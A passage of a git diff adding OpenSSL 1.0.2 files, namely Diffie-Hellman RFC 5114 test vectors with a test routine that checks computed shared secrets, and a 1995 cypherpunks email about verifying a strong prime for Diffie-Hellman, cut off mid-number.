+};
+
+static const unsigned char dhtest_1024_160_yA[] = {
+    0x2A, 0x85, 0x3B, 0x3D, 0x92, 0x19, 0x75, 0x01, 0xB9, 0x01, 0x5B, 0x2D,
+    0xEB, 0x3E, 0xD8, 0x4F, 0x5E, 0x02, 0x1D, 0xCC, 0x3E, 0x52, 0xF1, 0x09,
+    0xD3, 0x27, 0x3D, 0x2B, 0x75, 0x21, 0x28, 0x1C, 0xBA, 0xBE, 0x0E, 0x76,
+    0xFF, 0x57, 0x27, 0xFA, 0x8A, 0xCC, 0xE2, 0x69, 0x56, 0xBA, 0x9A, 0x1F,
+    0xCA, 0x26, 0xF2, 0x02, 0x28, 0xD8, 0x69, 0x3F, 0xEB, 0x10, 0x84, 0x1D,
+    0x84, 0xA7, 0x36, 0x00, 0x54, 0xEC, 0xE5, 0xA7, 0xF5, 0xB7, 0xA6, 0x1A,
+    0xD3, 0xDF, 0xB3, 0xC6, 0x0D, 0x2E, 0x43, 0x10, 0x6D, 0x87, 0x27, 0xDA,
+    0x37, 0xDF, 0x9C, 0xCE, 0x95, 0xB4, 0x78, 0x75, 0x5D, 0x06, 0xBC, 0xEA,
+    0x8F, 0x9D, 0x45, 0x96, 0x5F, 0x75, 0xA5, 0xF3, 0xD1, 0xDF, 0x37, 0x01,
+    0x16, 0x5F, 0xC9, 0xE5, 0x0C, 0x42, 0x79, 0xCE, 0xB0, 0x7F, 0x98, 0x95,
+    0x40, 0xAE, 0x96, 0xD5, 0xD8, 0x8E, 0xD7, 0x76
+};
+
+static const unsigned char dhtest_1024_160_xB[] = {
+    0x93, 0x92, 0xC9, 0xF9, 0xEB, 0x6A, 0x7A, 0x6A, 0x90, 0x22, 0xF7, 0xD8,
+    0x3E, 0x72, 0x23, 0xC6, 0x83, 0x5B, 0xBD, 0xDA
+};
+
+static const unsigned char dhtest_1024_160_yB[] = {
+    0x71, 0x7A, 0x6C, 0xB0, 0x53, 0x37, 0x1F, 0xF4, 0xA3, 0xB9, 0x32, 0x94,
+    0x1C, 0x1E, 0x56, 0x63, 0xF8, 0x61, 0xA1, 0xD6, 0xAD, 0x34, 0xAE, 0x66,
+    0x57, 0x6D, 0xFB, 0x98, 0xF6, 0xC6, 0xCB, 0xF9, 0xDD, 0xD5, 0xA5, 0x6C,
+    0x78, 0x33, 0xF6, 0xBC, 0xFD, 0xFF, 0x09, 0x55, 0x82, 0xAD, 0x86, 0x8E,
+    0x44, 0x0E, 0x8D, 0x09, 0xFD, 0x76, 0x9E, 0x3C, 0xEC, 0xCD, 0xC3, 0xD3,
+    0xB1, 0xE4, 0xCF, 0xA0, 0x57, 0x77, 0x6C, 0xAA, 0xF9, 0x73, 0x9B, 0x6A,
+    0x9F, 0xEE, 0x8E, 0x74, 0x11, 0xF8, 0xD6, 0xDA, 0xC0, 0x9D, 0x6A, 0x4E,
+    0xDB, 0x46, 0xCC, 0x2B, 0x5D, 0x52, 0x03, 0x09, 0x0E, 0xAE, 0x61, 0x26,
+    0x31, 0x1E, 0x53, 0xFD, 0x2C, 0x14, 0xB5, 0x74, 0xE6, 0xA3, 0x10, 0x9A,
+    0x3D, 0xA1, 0xBE, 0x41, 0xBD, 0xCE, 0xAA, 0x18, 0x6F, 0x5C, 0xE0, 0x67,
+    0x16, 0xA2, 0xB6, 0xA0, 0x7B, 0x3C, 0x33, 0xFE
+};
+
+static const unsigned char dhtest_1024_160_Z[] = {
+    0x5C, 0x80, 0x4F, 0x45, 0x4D, 0x30, 0xD9, 0xC4, 0xDF, 0x85, 0x27, 0x1F,
+    0x93, 0x52, 0x8C, 0x91, 0xDF, 0x6B, 0x48, 0xAB, 0x5F, 0x80, 0xB3, 0xB5,
+    0x9C, 0xAA, 0xC1, 0xB2, 0x8F, 0x8A, 0xCB, 0xA9, 0xCD, 0x3E, 0x39, 0xF3,
+    0xCB, 0x61, 0x45, 0x25, 0xD9, 0x52, 0x1D, 0x2E, 0x64, 0x4C, 0x53, 0xB8,
+    0x07, 0xB8, 0x10, 0xF3, 0x40, 0x06, 0x2F, 0x25, 0x7D, 0x7D, 0x6F, 0xBF,
+    0xE8, 0xD5, 0xE8, 0xF0, 0x72, 0xE9, 0xB6, 0xE9, 0xAF, 0xDA, 0x94, 0x13,
+    0xEA, 0xFB, 0x2E, 0x8B, 0x06, 0x99, 0xB1, 0xFB, 0x5A, 0x0C, 0xAC, 0xED,
+    0xDE, 0xAE, 0xAD, 0x7E, 0x9C, 0xFB, 0xB3, 0x6A, 0xE2, 0xB4, 0x20, 0x83,
+    0x5B, 0xD8, 0x3A, 0x19, 0xFB, 0x0B, 0x5E, 0x96, 0xBF, 0x8F, 0xA4, 0xD0,
+    0x9E, 0x34, 0x55, 0x25, 0x16, 0x7E, 0xCD, 0x91, 0x55, 0x41, 0x6F, 0x46,
+    0xF4, 0x08, 0xED, 0x31, 0xB6, 0x3C, 0x6E, 0x6D
+};
+
+static const unsigned char dhtest_2048_224_xA[] = {
+    0x22, 0xE6, 0x26, 0x01, 0xDB, 0xFF, 0xD0, 0x67, 0x08, 0xA6, 0x80, 0xF7,
+    0x47, 0xF3, 0x61, 0xF7, 0x6D, 0x8F, 0x4F, 0x72, 0x1A, 0x05, 0x48, 0xE4,
+    0x83, 0x29, 0x4B, 0x0C
+};
+
+static const unsigned char dhtest_2048_224_yA[] = {
+    0x1B, 0x3A, 0x63, 0x45, 0x1B, 0xD8, 0x86, 0xE6, 0x99, 0xE6, 0x7B, 0x49,
+    0x4E, 0x28, 0x8B, 0xD7, 0xF8, 0xE0, 0xD3, 0x70, 0xBA, 0xDD, 0xA7, 0xA0,
+    0xEF, 0xD2, 0xFD, 0xE7, 0xD8, 0xF6, 0x61, 0x45, 0xCC, 0x9F, 0x28, 0x04,
+    0x19, 0x97, 0x5E, 0xB8, 0x08, 0x87, 0x7C, 0x8A, 0x4C, 0x0C, 0x8E, 0x0B,
+    0xD4, 0x8D, 0x4A, 0x54, 0x01, 0xEB, 0x1E, 0x87, 0x76, 0xBF, 0xEE, 0xE1,
+    0x34, 0xC0, 0x38, 0x31, 0xAC, 0x27, 0x3C, 0xD9, 0xD6, 0x35, 0xAB, 0x0C,
+    0xE0, 0x06, 0xA4, 0x2A, 0x88, 0x7E, 0x3F, 0x52, 0xFB, 0x87, 0x66, 0xB6,
+    0x50, 0xF3, 0x80, 0x78, 0xBC, 0x8E, 0xE8, 0x58, 0x0C, 0xEF, 0xE2, 0x43,
+    0x96, 0x8C, 0xFC, 0x4F, 0x8D, 0xC3, 0xDB, 0x08, 0x45, 0x54, 0x17, 0x1D,
+    0x41, 0xBF, 0x2E, 0x86, 0x1B, 0x7B, 0xB4, 0xD6, 0x9D, 0xD0, 0xE0, 0x1E,
+    0xA3, 0x87, 0xCB, 0xAA, 0x5C, 0xA6, 0x72, 0xAF, 0xCB, 0xE8, 0xBD, 0xB9,
+    0xD6, 0x2D, 0x4C, 0xE1, 0x5F, 0x17, 0xDD, 0x36, 0xF9, 0x1E, 0xD1, 0xEE,
+    0xDD, 0x65, 0xCA, 0x4A, 0x06, 0x45, 0x5C, 0xB9, 0x4C, 0xD4, 0x0A, 0x52,
+    0xEC, 0x36, 0x0E, 0x84, 0xB3, 0xC9, 0x26, 0xE2, 0x2C, 0x43, 0x80, 0xA3,
+    0xBF, 0x30, 0x9D, 0x56, 0x84, 0x97, 0x68, 0xB7, 0xF5, 0x2C, 0xFD, 0xF6,
+    0x55, 0xFD, 0x05, 0x3A, 0x7E, 0xF7, 0x06, 0x97, 0x9E, 0x7E, 0x58, 0x06,
+    0xB1, 0x7D, 0xFA, 0xE5, 0x3A, 0xD2, 0xA5, 0xBC, 0x56, 0x8E, 0xBB, 0x52,
+    0x9A, 0x7A, 0x61, 0xD6, 0x8D, 0x25, 0x6F, 0x8F, 0xC9, 0x7C, 0x07, 0x4A,
+    0x86, 0x1D, 0x82, 0x7E, 0x2E, 0xBC, 0x8C, 0x61, 0x34, 0x55, 0x31, 0x15,
+    0xB7, 0x0E, 0x71, 0x03, 0x92, 0x0A, 0xA1, 0x6D, 0x85, 0xE5, 0x2B, 0xCB,
+    0xAB, 0x8D, 0x78, 0x6A, 0x68, 0x17, 0x8F, 0xA8, 0xFF, 0x7C, 0x2F, 0x5C,
+    0x71, 0x64, 0x8D, 0x6F
+};
+
+static const unsigned char dhtest_2048_224_xB[] = {
+    0x4F, 0xF3, 0xBC, 0x96, 0xC7, 0xFC, 0x6A, 0x6D, 0x71, 0xD3, 0xB3, 0x63,
+    0x80, 0x0A, 0x7C, 0xDF, 0xEF, 0x6F, 0xC4, 0x1B, 0x44, 0x17, 0xEA, 0x15,
+    0x35, 0x3B, 0x75, 0x90
+};
+
+static const unsigned char dhtest_2048_224_yB[] = {
+    0x4D, 0xCE, 0xE9, 0x92, 0xA9, 0x76, 0x2A, 0x13, 0xF2, 0xF8, 0x38, 0x44,
+    0xAD, 0x3D, 0x77, 0xEE, 0x0E, 0x31, 0xC9, 0x71, 0x8B, 0x3D, 0xB6, 0xC2,
+    0x03, 0x5D, 0x39, 0x61, 0x18, 0x2C, 0x3E, 0x0B, 0xA2, 0x47, 0xEC, 0x41,
+    0x82, 0xD7, 0x60, 0xCD, 0x48, 0xD9, 0x95, 0x99, 0x97, 0x06, 0x22, 0xA1,
+    0x88, 0x1B, 0xBA, 0x2D, 0xC8, 0x22, 0x93, 0x9C, 0x78, 0xC3, 0x91, 0x2C,
+    0x66, 0x61, 0xFA, 0x54, 0x38, 0xB2, 0x07, 0x66, 0x22, 0x2B, 0x75, 0xE2,
+    0x4C, 0x2E, 0x3A, 0xD0, 0xC7, 0x28, 0x72, 0x36, 0x12, 0x95, 0x25, 0xEE,
+    0x15, 0xB5, 0xDD, 0x79, 0x98, 0xAA, 0x04, 0xC4, 0xA9, 0x69, 0x6C, 0xAC,
+    0xD7, 0x17, 0x20, 0x83, 0xA9, 0x7A, 0x81, 0x66, 0x4E, 0xAD, 0x2C, 0x47,
+    0x9E, 0x44, 0x4E, 0x4C, 0x06, 0x54, 0xCC, 0x19, 0xE2, 0x8D, 0x77, 0x03,
+    0xCE, 0xE8, 0xDA, 0xCD, 0x61, 0x26, 0xF5, 0xD6, 0x65, 0xEC, 0x52, 0xC6,
+    0x72, 0x55, 0xDB, 0x92, 0x01, 0x4B, 0x03, 0x7E, 0xB6, 0x21, 0xA2, 0xAC,
+    0x8E, 0x36, 0x5D, 0xE0, 0x71, 0xFF, 0xC1, 0x40, 0x0A, 0xCF, 0x07, 0x7A,
+    0x12, 0x91, 0x3D, 0xD8, 0xDE, 0x89, 0x47, 0x34, 0x37, 0xAB, 0x7B, 0xA3,
+    0x46, 0x74, 0x3C, 0x1B, 0x21, 0x5D, 0xD9, 0xC1, 0x21, 0x64, 0xA7, 0xE4,
+    0x05, 0x31, 0x18, 0xD1, 0x99, 0xBE, 0xC8, 0xEF, 0x6F, 0xC5, 0x61, 0x17,
+    0x0C, 0x84, 0xC8, 0x7D, 0x10, 0xEE, 0x9A, 0x67, 0x4A, 0x1F, 0xA8, 0xFF,
+    0xE1, 0x3B, 0xDF, 0xBA, 0x1D, 0x44, 0xDE, 0x48, 0x94, 0x6D, 0x68, 0xDC,
+    0x0C, 0xDD, 0x77, 0x76, 0x35, 0xA7, 0xAB, 0x5B, 0xFB, 0x1E, 0x4B, 0xB7,
+    0xB8, 0x56, 0xF9, 0x68, 0x27, 0x73, 0x4C, 0x18, 0x41, 0x38, 0xE9, 0x15,
+    0xD9, 0xC3, 0x00, 0x2E, 0xBC, 0xE5, 0x31, 0x20, 0x54, 0x6A, 0x7E, 0x20,
+    0x02, 0x14, 0x2B, 0x6C
+};
+
+static const unsigned char dhtest_2048_224_Z[] = {
+    0x34, 0xD9, 0xBD, 0xDC, 0x1B, 0x42, 0x17, 0x6C, 0x31, 0x3F, 0xEA, 0x03,
+    0x4C, 0x21, 0x03, 0x4D, 0x07, 0x4A, 0x63, 0x13, 0xBB, 0x4E, 0xCD, 0xB3,
+    0x70, 0x3F, 0xFF, 0x42, 0x45, 0x67, 0xA4, 0x6B, 0xDF, 0x75, 0x53, 0x0E,
+    0xDE, 0x0A, 0x9D, 0xA5, 0x22, 0x9D, 0xE7, 0xD7, 0x67, 0x32, 0x28, 0x6C,
+    0xBC, 0x0F, 0x91, 0xDA, 0x4C, 0x3C, 0x85, 0x2F, 0xC0, 0x99, 0xC6, 0x79,
+    0x53, 0x1D, 0x94, 0xC7, 0x8A, 0xB0, 0x3D, 0x9D, 0xEC, 0xB0, 0xA4, 0xE4,
+    0xCA, 0x8B, 0x2B, 0xB4, 0x59, 0x1C, 0x40, 0x21, 0xCF, 0x8C, 0xE3, 0xA2,
+    0x0A, 0x54, 0x1D, 0x33, 0x99, 0x40, 0x17, 0xD0, 0x20, 0x0A, 0xE2, 0xC9,
+    0x51, 0x6E, 0x2F, 0xF5, 0x14, 0x57, 0x79, 0x26, 0x9E, 0x86, 0x2B, 0x0F,
+    0xB4, 0x74, 0xA2, 0xD5, 0x6D, 0xC3, 0x1E, 0xD5, 0x69, 0xA7, 0x70, 0x0B,
+    0x4C, 0x4A, 0xB1, 0x6B, 0x22, 0xA4, 0x55, 0x13, 0x53, 0x1E, 0xF5, 0x23,
+    0xD7, 0x12, 0x12, 0x07, 0x7B, 0x5A, 0x16, 0x9B, 0xDE, 0xFF, 0xAD, 0x7A,
+    0xD9, 0x60, 0x82, 0x84, 0xC7, 0x79, 0x5B, 0x6D, 0x5A, 0x51, 0x83, 0xB8,
+    0x70, 0x66, 0xDE, 0x17, 0xD8, 0xD6, 0x71, 0xC9, 0xEB, 0xD8, 0xEC, 0x89,
+    0x54, 0x4D, 0x45, 0xEC, 0x06, 0x15, 0x93, 0xD4, 0x42, 0xC6, 0x2A, 0xB9,
+    0xCE, 0x3B, 0x1C, 0xB9, 0x94, 0x3A, 0x1D, 0x23, 0xA5, 0xEA, 0x3B, 0xCF,
+    0x21, 0xA0, 0x14, 0x71, 0xE6, 0x7E, 0x00, 0x3E, 0x7F, 0x8A, 0x69, 0xC7,
+    0x28, 0xBE, 0x49, 0x0B, 0x2F, 0xC8, 0x8C, 0xFE, 0xB9, 0x2D, 0xB6, 0xA2,
+    0x15, 0xE5, 0xD0, 0x3C, 0x17, 0xC4, 0x64, 0xC9, 0xAC, 0x1A, 0x46, 0xE2,
+    0x03, 0xE1, 0x3F, 0x95, 0x29, 0x95, 0xFB, 0x03, 0xC6, 0x9D, 0x3C, 0xC4,
+    0x7F, 0xCB, 0x51, 0x0B, 0x69, 0x98, 0xFF, 0xD3, 0xAA, 0x6D, 0xE7, 0x3C,
+    0xF9, 0xF6, 0x38, 0x69
+};
+
+static const unsigned char dhtest_2048_256_xA[] = {
+    0x08, 0x81, 0x38, 0x2C, 0xDB, 0x87, 0x66, 0x0C, 0x6D, 0xC1, 0x3E, 0x61,
+    0x49, 0x38, 0xD5, 0xB9, 0xC8, 0xB2, 0xF2, 0x48, 0x58, 0x1C, 0xC5, 0xE3,
+    0x1B, 0x35, 0x45, 0x43, 0x97, 0xFC, 0xE5, 0x0E
+};
+
+static const unsigned char dhtest_2048_256_yA[] = {
+    0x2E, 0x93, 0x80, 0xC8, 0x32, 0x3A, 0xF9, 0x75, 0x45, 0xBC, 0x49, 0x41,
+    0xDE, 0xB0, 0xEC, 0x37, 0x42, 0xC6, 0x2F, 0xE0, 0xEC, 0xE8, 0x24, 0xA6,
+    0xAB, 0xDB, 0xE6, 0x6C, 0x59, 0xBE, 0xE0, 0x24, 0x29, 0x11, 0xBF, 0xB9,
+    0x67, 0x23, 0x5C, 0xEB, 0xA3, 0x5A, 0xE1, 0x3E, 0x4E, 0xC7, 0x52, 0xBE,
+    0x63, 0x0B, 0x92, 0xDC, 0x4B, 0xDE, 0x28, 0x47, 0xA9, 0xC6, 0x2C, 0xB8,
+    0x15, 0x27, 0x45, 0x42, 0x1F, 0xB7, 0xEB, 0x60, 0xA6, 0x3C, 0x0F, 0xE9,
+    0x15, 0x9F, 0xCC, 0xE7, 0x26, 0xCE, 0x7C, 0xD8, 0x52, 0x3D, 0x74, 0x50,
+    0x66, 0x7E, 0xF8, 0x40, 0xE4, 0x91, 0x91, 0x21, 0xEB, 0x5F, 0x01, 0xC8,
+    0xC9, 0xB0, 0xD3, 0xD6, 0x48, 0xA9, 0x3B, 0xFB, 0x75, 0x68, 0x9E, 0x82,
+    0x44, 0xAC, 0x13, 0x4A, 0xF5, 0x44, 0x71, 0x1C, 0xE7, 0x9A, 0x02, 0xDC,
+    0xC3, 0x42, 0x26, 0x68, 0x47, 0x80, 0xDD, 0xDC, 0xB4, 0x98, 0x59, 0x41,
+    0x06, 0xC3, 0x7F, 0x5B, 0xC7, 0x98, 0x56, 0x48, 0x7A, 0xF5, 0xAB, 0x02,
+    0x2A, 0x2E, 0x5E, 0x42, 0xF0, 0x98, 0x97, 0xC1, 0xA8, 0x5A, 0x11, 0xEA,
+    0x02, 0x12, 0xAF, 0x04, 0xD9, 0xB4, 0xCE, 0xBC, 0x93, 0x7C, 0x3C, 0x1A,
+    0x3E, 0x15, 0xA8, 0xA0, 0x34, 0x2E, 0x33, 0x76, 0x15, 0xC8, 0x4E, 0x7F,
+    0xE3, 0xB8, 0xB9, 0xB8, 0x7F, 0xB1, 0xE7, 0x3A, 0x15, 0xAF, 0x12, 0xA3,
+    0x0D, 0x74, 0x6E, 0x06, 0xDF, 0xC3, 0x4F, 0x29, 0x0D, 0x79, 0x7C, 0xE5,
+    0x1A, 0xA1, 0x3A, 0xA7, 0x85, 0xBF, 0x66, 0x58, 0xAF, 0xF5, 0xE4, 0xB0,
+    0x93, 0x00, 0x3C, 0xBE, 0xAF, 0x66, 0x5B, 0x3C, 0x2E, 0x11, 0x3A, 0x3A,
+    0x4E, 0x90, 0x52, 0x69, 0x34, 0x1D, 0xC0, 0x71, 0x14, 0x26, 0x68, 0x5F,
+    0x4E, 0xF3, 0x7E, 0x86, 0x8A, 0x81, 0x26, 0xFF, 0x3F, 0x22, 0x79, 0xB5,
+    0x7C, 0xA6, 0x7E, 0x29
+};
+
+static const unsigned char dhtest_2048_256_xB[] = {
+    0x7D, 0x62, 0xA7, 0xE3, 0xEF, 0x36, 0xDE, 0x61, 0x7B, 0x13, 0xD1, 0xAF,
+    0xB8, 0x2C, 0x78, 0x0D, 0x83, 0xA2, 0x3B, 0xD4, 0xEE, 0x67, 0x05, 0x64,
+    0x51, 0x21, 0xF3, 0x71, 0xF5, 0x46, 0xA5, 0x3D
+};
+
+static const unsigned char dhtest_2048_256_yB[] = {
+    0x57, 0x5F, 0x03, 0x51, 0xBD, 0x2B, 0x1B, 0x81, 0x74, 0x48, 0xBD, 0xF8,
+    0x7A, 0x6C, 0x36, 0x2C, 0x1E, 0x28, 0x9D, 0x39, 0x03, 0xA3, 0x0B, 0x98,
+    0x32, 0xC5, 0x74, 0x1F, 0xA2, 0x50, 0x36, 0x3E, 0x7A, 0xCB, 0xC7, 0xF7,
+    0x7F, 0x3D, 0xAC, 0xBC, 0x1F, 0x13, 0x1A, 0xDD, 0x8E, 0x03, 0x36, 0x7E,
+    0xFF, 0x8F, 0xBB, 0xB3, 0xE1, 0xC5, 0x78, 0x44, 0x24, 0x80, 0x9B, 0x25,
+    0xAF, 0xE4, 0xD2, 0x26, 0x2A, 0x1A, 0x6F, 0xD2, 0xFA, 0xB6, 0x41, 0x05,
+    0xCA, 0x30, 0xA6, 0x74, 0xE0, 0x7F, 0x78, 0x09, 0x85, 0x20, 0x88, 0x63,
+    0x2F, 0xC0, 0x49, 0x23, 0x37, 0x91, 0xAD, 0x4E, 0xDD, 0x08, 0x3A, 0x97,
+    0x8B, 0x88, 0x3E, 0xE6, 0x18, 0xBC, 0x5E, 0x0D, 0xD0, 0x47, 0x41, 0x5F,
+    0x2D, 0x95, 0xE6, 0x83, 0xCF, 0x14, 0x82, 0x6B, 0x5F, 0xBE, 0x10, 0xD3,
+    0xCE, 0x41, 0xC6, 0xC1, 0x20, 0xC7, 0x8A, 0xB2, 0x00, 0x08, 0xC6, 0x98,
+    0xBF, 0x7F, 0x0B, 0xCA, 0xB9, 0xD7, 0xF4, 0x07, 0xBE, 0xD0, 0xF4, 0x3A,
+    0xFB, 0x29, 0x70, 0xF5, 0x7F, 0x8D, 0x12, 0x04, 0x39, 0x63, 0xE6, 0x6D,
+    0xDD, 0x32, 0x0D, 0x59, 0x9A, 0xD9, 0x93, 0x6C, 0x8F, 0x44, 0x13, 0x7C,
+    0x08, 0xB1, 0x80, 0xEC, 0x5E, 0x98, 0x5C, 0xEB, 0xE1, 0x86, 0xF3, 0xD5,
+    0x49, 0x67, 0x7E, 0x80, 0x60, 0x73, 0x31, 0xEE, 0x17, 0xAF, 0x33, 0x80,
+    0xA7, 0x25, 0xB0, 0x78, 0x23, 0x17, 0xD7, 0xDD, 0x43, 0xF5, 0x9D, 0x7A,
+    0xF9, 0x56, 0x8A, 0x9B, 0xB6, 0x3A, 0x84, 0xD3, 0x65, 0xF9, 0x22, 0x44,
+    0xED, 0x12, 0x09, 0x88, 0x21, 0x93, 0x02, 0xF4, 0x29, 0x24, 0xC7, 0xCA,
+    0x90, 0xB8, 0x9D, 0x24, 0xF7, 0x1B, 0x0A, 0xB6, 0x97, 0x82, 0x3D, 0x7D,
+    0xEB, 0x1A, 0xFF, 0x5B, 0x0E, 0x8E, 0x4A, 0x45, 0xD4, 0x9F, 0x7F, 0x53,
+    0x75, 0x7E, 0x19, 0x13
+};
+
+static const unsigned char dhtest_2048_256_Z[] = {
+    0x86, 0xC7, 0x0B, 0xF8, 0xD0, 0xBB, 0x81, 0xBB, 0x01, 0x07, 0x8A, 0x17,
+    0x21, 0x9C, 0xB7, 0xD2, 0x72, 0x03, 0xDB, 0x2A, 0x19, 0xC8, 0x77, 0xF1,
+    0xD1, 0xF1, 0x9F, 0xD7, 0xD7, 0x7E, 0xF2, 0x25, 0x46, 0xA6, 0x8F, 0x00,
+    0x5A, 0xD5, 0x2D, 0xC8, 0x45, 0x53, 0xB7, 0x8F, 0xC6, 0x03, 0x30, 0xBE,
+    0x51, 0xEA, 0x7C, 0x06, 0x72, 0xCA, 0xC1, 0x51, 0x5E, 0x4B, 0x35, 0xC0,
+    0x47, 0xB9, 0xA5, 0x51, 0xB8, 0x8F, 0x39, 0xDC, 0x26, 0xDA, 0x14, 0xA0,
+    0x9E, 0xF7, 0x47, 0x74, 0xD4, 0x7C, 0x76, 0x2D, 0xD1, 0x77, 0xF9, 0xED,
+    0x5B, 0xC2, 0xF1, 0x1E, 0x52, 0xC8, 0x79, 0xBD, 0x95, 0x09, 0x85, 0x04,
+    0xCD, 0x9E, 0xEC, 0xD8, 0xA8, 0xF9, 0xB3, 0xEF, 0xBD, 0x1F, 0x00, 0x8A,
+    0xC5, 0x85, 0x30, 0x97, 0xD9, 0xD1, 0x83, 0x7F, 0x2B, 0x18, 0xF7, 0x7C,
+    0xD7, 0xBE, 0x01, 0xAF, 0x80, 0xA7, 0xC7, 0xB5, 0xEA, 0x3C, 0xA5, 0x4C,
+    0xC0, 0x2D, 0x0C, 0x11, 0x6F, 0xEE, 0x3F, 0x95, 0xBB, 0x87, 0x39, 0x93,
+    0x85, 0x87, 0x5D, 0x7E, 0x86, 0x74, 0x7E, 0x67, 0x6E, 0x72, 0x89, 0x38,
+    0xAC, 0xBF, 0xF7, 0x09, 0x8E, 0x05, 0xBE, 0x4D, 0xCF, 0xB2, 0x40, 0x52,
+    0xB8, 0x3A, 0xEF, 0xFB, 0x14, 0x78, 0x3F, 0x02, 0x9A, 0xDB, 0xDE, 0x7F,
+    0x53, 0xFA, 0xE9, 0x20, 0x84, 0x22, 0x40, 0x90, 0xE0, 0x07, 0xCE, 0xE9,
+    0x4D, 0x4B, 0xF2, 0xBA, 0xCE, 0x9F, 0xFD, 0x4B, 0x57, 0xD2, 0xAF, 0x7C,
+    0x72, 0x4D, 0x0C, 0xAA, 0x19, 0xBF, 0x05, 0x01, 0xF6, 0xF1, 0x7B, 0x4A,
+    0xA1, 0x0F, 0x42, 0x5E, 0x3E, 0xA7, 0x60, 0x80, 0xB4, 0xB9, 0xD6, 0xB3,
+    0xCE, 0xFE, 0xA1, 0x15, 0xB2, 0xCE, 0xB8, 0x78, 0x9B, 0xB8, 0xA3, 0xB0,
+    0xEA, 0x87, 0xFE, 0xBE, 0x63, 0xB6, 0xC8, 0xF8, 0x46, 0xEC, 0x6D, 0xB0,
+    0xC2, 0x6C, 0x5D, 0x7C
+};
+
+typedef struct {
+    DH *(*get_param) (void);
+    const unsigned char *xA;
+    size_t xA_len;
+    const unsigned char *yA;
+    size_t yA_len;
+    const unsigned char *xB;
+    size_t xB_len;
+    const unsigned char *yB;
+    size_t yB_len;
+    const unsigned char *Z;
+    size_t Z_len;
+} rfc5114_td;
+
+# define make_rfc5114_td(pre) { \
+        DH_get_##pre, \
+        dhtest_##pre##_xA, sizeof(dhtest_##pre##_xA), \
+        dhtest_##pre##_yA, sizeof(dhtest_##pre##_yA), \
+        dhtest_##pre##_xB, sizeof(dhtest_##pre##_xB), \
+        dhtest_##pre##_yB, sizeof(dhtest_##pre##_yB), \
+        dhtest_##pre##_Z, sizeof(dhtest_##pre##_Z) \
+        }
+
+static const rfc5114_td rfctd[] = {
+        make_rfc5114_td(1024_160),
+        make_rfc5114_td(2048_224),
+        make_rfc5114_td(2048_256)
+};
+
+static int run_rfc5114_tests(void)
+{
+    int i;
+    for (i = 0; i < (int)(sizeof(rfctd) / sizeof(rfc5114_td)); i++) {
+        DH *dhA, *dhB;
+        unsigned char *Z1 = NULL, *Z2 = NULL;
+        const rfc5114_td *td = rfctd + i;
+        /* Set up DH structures setting key components */
+        dhA = td->get_param();
+        dhB = td->get_param();
+        if (!dhA || !dhB)
+            goto bad_err;
+
+        dhA->priv_key = BN_bin2bn(td->xA, td->xA_len, NULL);
+        dhA->pub_key = BN_bin2bn(td->yA, td->yA_len, NULL);
+
+        dhB->priv_key = BN_bin2bn(td->xB, td->xB_len, NULL);
+        dhB->pub_key = BN_bin2bn(td->yB, td->yB_len, NULL);
+
+        if (!dhA->priv_key || !dhA->pub_key
+            || !dhB->priv_key || !dhB->pub_key)
+            goto bad_err;
+
+        if ((td->Z_len != (size_t)DH_size(dhA))
+            || (td->Z_len != (size_t)DH_size(dhB)))
+            goto err;
+
+        Z1 = OPENSSL_malloc(DH_size(dhA));
+        Z2 = OPENSSL_malloc(DH_size(dhB));
+        /*
+         * Work out shared secrets using both sides and compare with expected
+         * values.
+         */
+        if (!DH_compute_key(Z1, dhB->pub_key, dhA))
+            goto bad_err;
+        if (!DH_compute_key(Z2, dhA->pub_key, dhB))
+            goto bad_err;
+
+        if (memcmp(Z1, td->Z, td->Z_len))
+            goto err;
+        if (memcmp(Z2, td->Z, td->Z_len))
+            goto err;
+
+        printf("RFC5114 parameter test %d OK\n", i + 1);
+
+        DH_free(dhA);
+        DH_free(dhB);
+        OPENSSL_free(Z1);
+        OPENSSL_free(Z2);
+
+    }
+    return 1;
+ bad_err:
+    fprintf(stderr, "Initalisation error RFC5114 set %d\n", i + 1);
+    ERR_print_errors_fp(stderr);
+    return 0;
+ err:
+    fprintf(stderr, "Test failed RFC5114 set %d\n", i + 1);
+    return 0;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/example b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/example
new file mode 100644
index 0000000..16a33d2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/example
@@ -0,0 +1,50 @@
+From owner-cypherpunks@toad.com Mon Sep 25 10:50:51 1995
+Received: from minbne.mincom.oz.au by orb.mincom.oz.au with SMTP id AA10562
+  (5.65c/IDA-1.4.4 for eay); Wed, 27 Sep 1995 19:41:55 +1000
+Received: by minbne.mincom.oz.au id AA19958
+  (5.65c/IDA-1.4.4 for eay@orb.mincom.oz.au); Wed, 27 Sep 1995 19:34:59 +1000
+Received: from relay3.UU.NET by bunyip.cc.uq.oz.au with SMTP (PP);
+          Wed, 27 Sep 1995 19:13:05 +1000
+Received: from toad.com by relay3.UU.NET with SMTP id QQzizb16156;
+          Wed, 27 Sep 1995 04:48:46 -0400
+Received: by toad.com id AA07905; Tue, 26 Sep 95 06:31:45 PDT
+Received: from by toad.com id AB07851; Tue, 26 Sep 95 06:31:40 PDT
+Received: from servo.qualcomm.com (servo.qualcomm.com [129.46.128.14]) 
+          by cygnus.com (8.6.12/8.6.9) with ESMTP id RAA18442 
+          for <cypherpunks@toad.com>; Mon, 25 Sep 1995 17:52:47 -0700
+Received: (karn@localhost) by servo.qualcomm.com (8.6.12/QC-BSD-2.5.1) 
+          id RAA14732; Mon, 25 Sep 1995 17:50:51 -0700
+Date: Mon, 25 Sep 1995 17:50:51 -0700
+From: Phil Karn <karn@qualcomm.com>
+Message-Id: <199509260050.RAA14732@servo.qualcomm.com>
+To: cypherpunks@toad.com, ipsec-dev@eit.com
+Subject: Primality verification needed
+Sender: owner-cypherpunks@toad.com
+Precedence: bulk
+Status: RO
+X-Status: 
+
+Hi. I've generated a 2047-bit "strong" prime number that I would like to
+use with Diffie-Hellman key exchange. I assert that not only is this number
+'p' prime, but so is (p-1)/2.
+
+I've used the mpz_probab_prime() function in the Gnu Math Package (GMP) version
+1.3.2 to test this number. This function uses the Miller-Rabin primality test.
+However, to increase my confidence that this number really is a strong prime,
+I'd like to ask others to confirm it with other tests. Here's the number in hex:
+
+72a925f760b2f954ed287f1b0953f3e6aef92e456172f9fe86fdd8822241b9c9788fbc289982743e
